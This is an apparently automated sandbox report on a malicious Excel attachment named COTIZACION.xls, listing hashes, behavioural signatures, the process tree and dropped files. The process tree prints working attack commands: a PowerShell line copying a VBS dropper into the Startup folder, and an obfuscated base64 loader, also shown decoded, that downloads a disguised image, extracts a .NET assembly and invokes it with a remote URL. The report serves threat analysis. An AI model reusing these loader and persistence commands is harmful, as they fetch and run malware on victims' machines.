Analysis

  • max time kernel
    40s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    18/08/2023, 03:20

General

  • Target

    COTIZACION.xls

  • Size

    1.4MB

  • MD5

    74c8f8643c29d8d19becd545eee7a48c

  • SHA1

    afaf8d9c8b504333a2824fcd18f1fbc87da6c48a

  • SHA256

    89b872366486882d0add3f52b59a244ccb38c30becf7c7fc238b2aa9a674ad93

  • SHA512

    c093add8ee59b709f05b71e5bd6cc3203c9d9748016c518e43783723294c93eb9ed1103696098e3ab2ab45bfeed5ad6563560a18d665193ac199b18923ae14c8

  • SSDEEP

    24576:lLQqSXdQp/XX46rg1HiB+6bvdXXXXXXXXXXXXUXXXXXXXXXXXXXXXXFfPShbZb+B:l0XdOwBEE6LaxgHrmi/9itk7Xu

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

exe.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops startup file 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\COTIZACION.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1648
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1708
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\internet.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\internet.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ rDf.vbs')"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 5
            4⤵
            • Runs ping.exe
            PID:1196
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\internet.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ rDf.vbs')"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1960
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\internet.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ rDf.vbs')
              5⤵
              • Drops startup file
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2680
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#bwB3#@$#HQ#@$#TgBJ#@$#EI#@$#LwBG#@$#E4#@$#Rg#@$#v#@$#DU#@$#Mg#@$#u#@$#DY#@$#N#@$##@$#u#@$#Dg#@$#Ng#@$#x#@$#C4#@$#N#@$##@$#w#@$#DE#@$#Lw#@$#v#@$#Do#@$#c#@$#B0#@$#HQ#@$#a#@$##@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C4#@$#SQBu#@$#HY#@$#bwBr#@$#GU#@$#K#@$##@$#k#@$#G4#@$#dQBs#@$#Gw#@$#L#@$##@$#g#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#KQ#@$#=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.owtNIB/FNF/52.64.861.401//:ptth');$method.Invoke($null, $arguments)"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2492

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{95C1B629-7059-40D9-B0EC-4F8657735948}.FSD

      Filesize

      128KB

      MD5

      b4aceab4324cbb29f149e7155230d6f6

      SHA1

      d171678807c0ead2a62bc03cdd7520aed3f9db92

      SHA256

      4dd183e55534eba37c5d1644864ea5219d79c333d078fd3922cf97ebcb91b2a5

      SHA512

      fec628530ee75b12353c5b58965d6ce33eded3fbab68d8314fe781cc80d5d29b68349417d807744a11e5fa6fcb1ff0a8bb95ec12ff973de605e26cea6f7dacdb

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      3b0f19926e445f2d6c13950e951dfa91

      SHA1

      24a139611f2d534c6a1f20d97b83d279354b63bb

      SHA256

      4024560d88e9a742ce6b69edcdc67533cf5f6ab09f60b3a3e58337f170c94021

      SHA512

      41a2b776755a8ab1bc2f7df8967436944f54f3a0855abd59dd183ae1c7f10ce7d7f9948be57c87b87b1d15ae118e82a12144bcae79f7dc313534bc617177380c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3VKWFGCX\0000Oo0oOOOO0o0ooO0Oo0o0o000000000##############000000000000000000##############00000000000[1].doc

      Filesize

      28KB

      MD5

      d12d35567b65ba4cd1ff066e8a16d473

      SHA1

      83f375869fd5b28fa10c3eb4ab39b57c4688d7d9

      SHA256

      21878810dc75afe148d8e4fa167478bf33c0076fc2b029c8169848947142a4b9

      SHA512

      eeff6e93b8d679d125e44632dc799f942ca8f885d53c8ef349254bb0682f9e541901b5ba27145af8c0fe8be21eb9bbd3bfa98dff1cac8e9462fe65fafa83d3e6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7D95937.doc

      Filesize

      28KB

      MD5

      d12d35567b65ba4cd1ff066e8a16d473

      SHA1

      83f375869fd5b28fa10c3eb4ab39b57c4688d7d9

      SHA256

      21878810dc75afe148d8e4fa167478bf33c0076fc2b029c8169848947142a4b9

      SHA512

      eeff6e93b8d679d125e44632dc799f942ca8f885d53c8ef349254bb0682f9e541901b5ba27145af8c0fe8be21eb9bbd3bfa98dff1cac8e9462fe65fafa83d3e6

    • C:\Users\Admin\AppData\Local\Temp\CabBD49.tmp

      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

      d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

    • C:\Users\Admin\AppData\Local\Temp\TarBFAC.tmp

      Filesize

      164KB

      MD5

      4ff65ad929cd9a367680e0e5b1c08166

      SHA1

      c0af0d4396bd1f15c45f39d3b849ba444233b3a2

      SHA256

      c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

      SHA512

      f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

    • C:\Users\Admin\AppData\Local\Temp\internet.vbs

      Filesize

      314KB

      MD5

      a9c620e730bf9e4403dd9bbb8f7cab03

      SHA1

      d85091a46598fd05d72d20efed3c5248029c2603

      SHA256

      6788d5a37d90579a7aa3366f41b75dd54cb1d76ca7518b7d48979c9a93b571b4

      SHA512

      6269cfbc80e684205950347e451b02c1bcf60a9eea47739acb11ac547b4855f1411b146c04fd981dde2beb0f5752758335fa40f0c9a940aef0a57022ee656cb7

    • C:\Users\Admin\AppData\Local\Temp\internet.vbs

      Filesize

      314KB

      MD5

      a9c620e730bf9e4403dd9bbb8f7cab03

      SHA1

      d85091a46598fd05d72d20efed3c5248029c2603

      SHA256

      6788d5a37d90579a7aa3366f41b75dd54cb1d76ca7518b7d48979c9a93b571b4

      SHA512

      6269cfbc80e684205950347e451b02c1bcf60a9eea47739acb11ac547b4855f1411b146c04fd981dde2beb0f5752758335fa40f0c9a940aef0a57022ee656cb7

    • C:\Users\Admin\AppData\Local\Temp\{7848C323-3129-433E-94C4-F049E5702388}

      Filesize

      128KB

      MD5

      5f0b623c1ed47c362fa73bbc78607514

      SHA1

      4710577bc5a01311af279668cf93e6d600433220

      SHA256

      8f2b0d92ca30a66f689cd55346072e690841a98f39e96b18379778e4f9a622d1

      SHA512

      0b0315403d9f2fd435259d57e4b3e2fc4f61de070159727909a82fefd34797de295e4390682fd8da58d0072ff7678239f7b511a4aa5728ab3ff4d19b597e6208

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S59P919UW50WJWWWIUY.temp

      Filesize

      7KB

      MD5

      428e4896ef71e4ad814bfcba6f5ebe71

      SHA1

      5223e431c1586cf7720de7f417aa6605ffadc9c5

      SHA256

      b562e03f801354cd8f6a28d149465f85d9ea25596ce674f4c38f0a5bdc8fbc65

      SHA512

      e81d5220332eb187bafdf0c23c8c442e79b5fdd5bf624dedf9978c821b7be1cb3a18b917aeb6084dc9546cb6cb272db5d863b90b9da6dad5db1c1194f18e12cd

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      428e4896ef71e4ad814bfcba6f5ebe71

      SHA1

      5223e431c1586cf7720de7f417aa6605ffadc9c5

      SHA256

      b562e03f801354cd8f6a28d149465f85d9ea25596ce674f4c38f0a5bdc8fbc65

      SHA512

      e81d5220332eb187bafdf0c23c8c442e79b5fdd5bf624dedf9978c821b7be1cb3a18b917aeb6084dc9546cb6cb272db5d863b90b9da6dad5db1c1194f18e12cd

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      428e4896ef71e4ad814bfcba6f5ebe71

      SHA1

      5223e431c1586cf7720de7f417aa6605ffadc9c5

      SHA256

      b562e03f801354cd8f6a28d149465f85d9ea25596ce674f4c38f0a5bdc8fbc65

      SHA512

      e81d5220332eb187bafdf0c23c8c442e79b5fdd5bf624dedf9978c821b7be1cb3a18b917aeb6084dc9546cb6cb272db5d863b90b9da6dad5db1c1194f18e12cd

    • memory/848-168-0x0000000002790000-0x00000000027D0000-memory.dmp

      Filesize

      256KB

    • memory/848-167-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/848-166-0x0000000002790000-0x00000000027D0000-memory.dmp

      Filesize

      256KB

    • memory/848-165-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/848-260-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/1396-65-0x0000000003680000-0x0000000003682000-memory.dmp

      Filesize

      8KB

    • memory/1396-61-0x000000002F3F0000-0x000000002F54D000-memory.dmp

      Filesize

      1.4MB

    • memory/1396-63-0x00000000731FD000-0x0000000073208000-memory.dmp

      Filesize

      44KB

    • memory/1396-150-0x00000000731FD000-0x0000000073208000-memory.dmp

      Filesize

      44KB

    • memory/1396-149-0x000000002F3F0000-0x000000002F54D000-memory.dmp

      Filesize

      1.4MB

    • memory/1648-148-0x00000000731FD000-0x0000000073208000-memory.dmp

      Filesize

      44KB

    • memory/1648-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1648-55-0x00000000731FD000-0x0000000073208000-memory.dmp

      Filesize

      44KB

    • memory/1648-66-0x0000000002470000-0x0000000002472000-memory.dmp

      Filesize

      8KB

    • memory/2492-175-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/2492-174-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/2492-176-0x0000000002640000-0x0000000002680000-memory.dmp

      Filesize

      256KB

    • memory/2492-177-0x0000000002640000-0x0000000002680000-memory.dmp

      Filesize

      256KB

    • memory/2492-259-0x0000000069AA0000-0x000000006A04B000-memory.dmp

      Filesize

      5.7MB

    • memory/2680-159-0x0000000069A30000-0x0000000069FDB000-memory.dmp

      Filesize

      5.7MB

    • memory/2680-157-0x00000000026F0000-0x0000000002730000-memory.dmp

      Filesize

      256KB

    • memory/2680-156-0x00000000026F0000-0x0000000002730000-memory.dmp

      Filesize

      256KB

    • memory/2680-155-0x00000000026F0000-0x0000000002730000-memory.dmp

      Filesize

      256KB

    • memory/2680-154-0x0000000069A30000-0x0000000069FDB000-memory.dmp

      Filesize

      5.7MB

    • memory/2680-153-0x0000000069A30000-0x0000000069FDB000-memory.dmp

      Filesize

      5.7MB